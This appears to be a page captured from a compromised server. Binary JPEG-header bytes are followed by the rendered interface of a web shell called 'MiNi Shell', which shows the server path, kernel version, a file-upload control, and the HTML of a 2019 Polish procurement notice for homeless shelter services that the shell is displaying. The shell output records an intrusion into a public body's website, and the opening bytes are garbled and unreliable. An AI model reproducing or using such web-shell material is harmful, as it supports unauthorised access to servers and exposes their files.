JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190129/508237-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 508237-N-2019 z dnia 2019-01-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Miejski Ośrodek Pomocy Społecznej</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Zapewnienie schronienia osobom bezdomnym z terenu miasta Wodzisławia Śląskiego</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Miejski Ośrodek Pomocy Społecznej</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">345301500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Ignacego Daszyńskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">44-300 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wodzisław Śląski</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">32 459 06 50, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">kancelaria@mops.wodzislaw-slaski.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 721 87 35</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.mops.wodzislaw-slaski.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.mops.wodzislaw-slaski.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.mops.wodzislaw-slaski.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Zapewnienie schronienia osobom bezdomnym z terenu miasta Wodzisławia Śląskiego</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">OR.272.00001.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Zadanie polega na udzieleniu tymczasowego schronienia dla osób bezdomnych na zasadach określonych w art. 48, art. 48a ustawy z dnia 12 marca 2004 r. o pomocy społecznej /tekst jedn. Dz. U. z 2018 r. poz. 1508 z późn. zm./.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">85311000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span 